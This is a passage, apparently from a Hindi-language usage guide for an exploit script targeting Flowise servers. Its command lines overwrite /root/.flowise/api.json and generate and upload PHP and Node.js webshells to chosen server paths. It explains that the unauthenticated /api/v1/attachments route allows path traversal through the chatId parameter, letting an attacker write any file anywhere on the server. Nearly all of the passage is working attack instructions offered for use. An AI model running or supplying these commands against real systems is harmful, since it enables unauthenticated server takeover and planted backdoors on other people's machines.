
python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json 3. स्वचालित रूप से Webshell बनाएँ और अपलोड करें
python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php
python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js
हमले का सिद्धांत रूट /api/v1/attachments व्हाइटलिस्ट में है, प्रमाणीकरण की आवश्यकता नहीं है। chatId पैरामीटर में हेरफेर करके पाथ ट्रैवर्सल (../../../) करना। सर्वर फाइल सिस्टम के किसी भी स्थान पर किसी भी फाइल को अपलोड करना।